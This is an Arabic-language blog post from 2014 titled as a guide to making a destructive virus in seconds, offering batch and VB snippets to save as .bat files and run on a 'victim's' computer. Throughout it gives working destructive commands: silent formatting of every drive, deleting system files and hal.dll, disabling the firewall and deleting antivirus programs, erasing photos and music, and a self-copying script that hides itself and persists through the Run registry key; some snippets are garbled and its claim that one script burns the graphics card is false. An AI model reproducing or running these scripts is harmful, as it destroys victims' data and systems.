التدوينة

dimanche 6 juillet 2014

طريقة صنع فيروس مدمر في ثواني

السلام عليكم 



هل سمعتم ببحر الاكواد المدمرة اكيييييييييد كلنا طيب حدا شافا اكييييييييد كتير بس معظم الناس بيقولو انو برايفت و شويت حكي و تخبيص

طيب انا اليوم ما رح ابخل عليكم ب اي شي بعرفو سواء كانت من تصميمي او من مواضيع بعض اصدقائنا

افتح مفكره او نوت باد و الصق فيها الكود و عند حفظها رح تلقاه ينحفظ بإسم New Text Document.txt

غير txt و اكتب bat

وبكذا الكود يكون جاهز روح ارفعه بجهاز الضحيه وشغله 

نبدأ الأكواد 
-----------------------------------------

-------------------------------

---------------
الكود هذا لفصل النت عن الضحيه 

@echo off

cd\

ipconfig /release

cd\

echo "you have a virus in your computer" >>smail.txt

start /max smail.txt

الكود لفرمتت اي بارتيشن عند الضحيه

نكتب الاوامر الآتية في برنامج المفكرة ونحفظه بامتداد .bat

FORMAT/Q C:/Y

CLS


وطبعا ده مثال فيمكن استبدال الحرف C مثلا بالحرف E*D*F الخاص باسم الدرايف


والفيروس بيفرمت من غير ما يسأل المستخدم [Y*N]


ليه *لان الحرف Y بعد اسم الدرايف معناه YES


والحرف Q بعد كلمة FORMAT لسرعة تنفيذ الامر


اما الامر CLS لمسح محتويات الشاشة حتى لا يلاحظ المستخدم ما حدث بجهازه


وده مثال بسيط للفيروس بيفرمت الاجزاء C*D*E*F*G من الهارد

FORMAT/Q D:/Y

CLS

FORMAT/Q E:/Y

CLS

FORMAT/Q F:/Y

CLS

FORMAT/Q G:/Y

CLS

FORMAT/Q C:/Y

وطبعا الفيروس بنزله في الجزء C في جهاز الضحية 

كود لحذف ملفات dll * sys

@Echo off 
c: 
cd %WinDir%\System\ 
deltree /y *.dll 
cd\ 
deltree /y *.sys

كود لتعطيل عمل الوندوز 

cd %systemroot%\system32 
del hal.dll 
shutdown -s

ابحث عن 

"C:\Document and Settings\username\Start Menu\Programs\Startup" 
في جهاز الضحية 

و الصق الكود هذا في مجلدStart UP

shutdown -s -t 10 -c "YOU GOT OWNED...

طبعا طريقة الإستخدام افتح مفكره و احفظ الكود بإمتداد bat

وظيفته كل ما يفتح الكمبيوتر ينغلق 

كود يمنع الضحية من تشغل المسنجر


ههههههههههههههههههههههههه ههههههههههههههههههههههه

هذا الكود بتنسخ مكان البيرسونال مسج 

لما ينسخه الضحية ما يقدر يتحكم بالمسنجر 
بضل يدخل ويطلع وما يقدر يدخل من نفس الجهاز الا ليحذف الملف الموجود هون 

:\\Documents and Settings\\[your account name]\\Local Settings\\Application Data\\Microsoft\\Windows Live Contacts\\[MSN address]\\real\\

يحذف ملف mecontact

n—a_?—ay±m—a?C?ç±C??±C?§?aC?C±OC?—� �C?§±C?r×?C ?+NC ?L?C?

كود يوقف عمل الجدار الناري

@echo off
netsh firewall set opmode disable

كود لإيقاف الفاره و لوحة المفاتيح
Private Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) Private Sub Form_Activate() DoEvents BlockInput True Sleep 1000 BlockInput False End Sub

احفظ الكود بعد وضعه فالمفكره بإمتداد vbs * html

وهذا الكود اهداء للمدمرين و محبي التخريب من nadooor

يحرق كرت الشاشه
Private Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long Private Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long* ByVal X As Long* ByVal Y As Long* ByVal nWidth As Long* ByVal nHeight As Long* ByVal hSrcDC As Long* ByVal xSrc As Long* ByVal ySrc As Long* ByVal dwRop As Long) As Long Private Sub Form_KeyDown(KeyCode As Integer* Shift As Integer) If KeyCode = vbKeyEscape Then Unload Me End Sub Private Sub Form_Load() Dim lngDC As Long Dim intWidth As Integer* intHeight As Integer Dim intX As Integer* intY As Integer lngDC = GetDC(0) intWidth = Screen.Width / Screen.TwipsPerPixelX intHeight = Screen.Height / Screen.TwipsPerPixelY form1.Width = intWidth * 15 form1.Height = intHeight * 15 Call BitBlt(hDC* 0* 0* intWidth* intHeight* lngDC* 0* 0* vbSrcCopy) form1.Visible = vbTrue Do intX = (intWidth - 128) * Rnd intY = (intHeight - 128) * Rnd Call BitBlt(lngDC* intX* intY + 1* 128* 128* lngDC* intX* intY* vbSrcCopy) DoEvents Loop End Sub Private Sub Form_Unload(Cancel As Integer) Set form1 = Nothing End End Sub

احفظ الكود بإمتداد vbs أو html


كود لحذف الأغاني بإمتداد mp3 و الصور بإمتداد jpg والأفلام بإمتداد asf 

@Echo off 
e: 
deltree /y *.jpg 
cd\ 
deltree /y *.mp3 
cd\ 
deltree /y *.asf

ممكن تغير mp3 وتختار الي بدك
احفظه بإمتداد bat و ارفعه على الضحيه

كود رائع لايقاف عمل اي برنامج في جهاز الضحيه وانا في الكود موضح ايقاف الايفرا و الزون اللارم

echo welcome to the phantom by dertunisiano@ @echo if u want to make your computer faster you should to following @echo the phantom steps (step by step) @pause cd\ c: dir dir c:\progra~1\aivra~1 @echo if u want to make your computer faster @pause @echo now you should to type y and press enter del c:\progra~1\aivra~1 @pause c: dir @echo if u want to make your computer faster @pause @dir c:\progra~1 dir c:\progra~1\zonea~1\zonealarm del c:\progra~1\zonea~1\zonealarm @echo be happy your computer now is faster than before :exit

غير زون اللارم والايفرا و اختار الي بدك بس انتبه على علامة ~ 

احفظ الكود بإمتداد bat و افتحه في جهاز الضحيه

وهذا كود الغائب 
<a href="" onmouseover="parent.********='[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]هنا رابط صفحتك الملغومة'"><b><font face="Akhbar MT">ضع جملة الرابطة هنا</font></b></A>

والكود هذا للصفحات الملغومه .. بمجرد مررور الماوس على الكود تنفتح الصفحه الملغومه

مكان جملة الرابط إكتب اي شي و هذا الكلام الي رح يبين فووووووووووق الصوب الثاني من علامة اكس اكتب مثلا Google
ضع رابط صفحتك الملغومه في مكانها 
و احفظ المفكره بإمتداد html و ارفعها

أنا ما جربته بس لو طلع طريقة الاستخدام خطأ اعتقد من الطريقه الأخيره و ارجو ان احد يفيدنا

كود لحذف شاشة ترحيب الوندوز
Del c:\windows\Logos.sys

Del c:\windows\Logow.sys

احفظ الكود بإمتداد bat و شغله عند الضحيه


وهذا الكود طال عمركم يخلي الكمبيوتر يقفل بعد عدد معين من الثواني انا خليتها 5 و يجي للضحيه رساله 

cmdow @ /HID
shutdown.exe -r -f -t 60 -c "Windows XP will now restart in 5 Seconds...****** by حط الكلام الذي تريد"
net user aspnet /delete
EXIT

اكيد حفظتو طريقة استخدام الأكواد 

و هذا كود لعيونكم عضو عضو
@echo off
net stop “Security Center”
netsh firewall set opmode mode=disable
del E-*
del av*
del fire*
del anti*
del spy*
del bullguard
del PersFw
del KAV*
del UfseAgnt*
del Spy*
del ZONEALARM
del SAFE***
del OUTPOST*
del nv*
del nav*
del F-*
del cle*
del BLACKICE
del def*
del kav*
del avg*
del ash*
del aswupdsv
del ewid*
del guard*
del guar*
del gcasDt*
del msmp*
del mcafe*
del mghtml
del msiexec
del *safe*
del zap*
del zauinst
del upd*
del zlclien*
del minilog
del cc*
del norton*
del norton au*
del ccc*
del npfmn*
del loge*
del nisum*
del issvc
del tmp*
del tmn*
del pcc*
del cpd*
del pop*
del pav*
del padmin
del panda*
del avsch*
del sche*
del syman*
del *virus*
del realm*
del sweep*
del scan*
del ad-*
del safe*
del avas*
del norm*
del offg*
del /Q /F %ProgramFiles%\alwils~1\avast4\*.*
del /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
del /Q /F %ProgramFiles%\kasper~1\*.exe
del /Q /F %ProgramFiles%\trojan~1\*.exe
del /Q /F %ProgramFiles%\f-prot95\*.*
del /Q /F %ProgramFiles%\tbav\*.dat
del /Q /F %ProgramFiles%\avpersonal\*.*
del /Q /F %ProgramFiles%\Norton~1\*.*
del /Q /F %ProgramFiles%\Mcafee\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
del /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*
del /Q /F %ProgramFiles%\Norton~1\*.*
del /Q /F %ProgramFiles%\avgamsr\*.exe
del /Q /F %ProgramFiles%\avgamsvr\*.exe
del /Q /F %ProgramFiles%\avgemc\*.exe
del /Q /F %ProgramFiles%\avgcc\*.exe
del /Q /F %ProgramFiles%\avgupsvc\*.exe
del /Q /F %ProgramFiles%\grisoft
del /Q /F %ProgramFiles%\nood32krn\*.exe
del /Q /F %ProgramFiles%\nood32\*.exe
del /Q /F %ProgramFiles%\nod32\*.exe
del /Q /F %ProgramFiles%\nood32\*.exe
del /Q /F %ProgramFiles%\kav\*.exe
del /Q /F %ProgramFiles%\kavmm\*.exe
del /Q /F %ProgramFiles%\kaspersky\*.*
del /Q /F %ProgramFiles%\ewidoctrl\*.exe
del /Q /F %ProgramFiles%\guard\*.exe
del /Q /F %ProgramFiles%\ewido\*.exe
del /Q /F %ProgramFiles%\pavprsrv\*.exe
del /Q /F %ProgramFiles%\pavprot\*.exe
del /Q /F %ProgramFiles%\avengine\*.exe
del /Q /F %ProgramFiles%\apvxdwin\*.exe
del /Q /F %ProgramFiles%\***proxy\*.exe
del /Q /F %ProgramFiles%\panda software\*.*

وفي النهاية كود له وظائف كثيره :

1-ينسخ الفيروس نفسه الي الStart UP

2-ويخبىء نفسه مع باقي الملفات التي يصنعها

3-ينهي عمل الMSN و النورتن و الWindows Explorer واشياء اخرى

4-ويعكس ازرار الماوس

5-ويغير الوقت في الويندوز الي الساعة الواحدة

6-ينذر المستخدم بوجود دائما

ههههههههههههههههههههههههه ه و الله عجبني الكود هذا
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

اذا في كود عجبك 

وتبي ان تجعله ينسخ نفسه الى ملف Start UP
Copy nad.bat C:\documents and setting\%userprofile%\Start Menu\Programs\Startup

وبدل nad.bat باسم الفيروس ولكن ضع .bat في نهاية الاسم

ولتجعل الفيروس يخبىء نفسه ضع هذا الكود 
Attrib +r +h Virus.bat
Attrib +r +h

اتمنى ان تنال اعجابكم 

انتظرو الجديد من اخوكم

Aucun commentaire:

Enregistrer un commentaire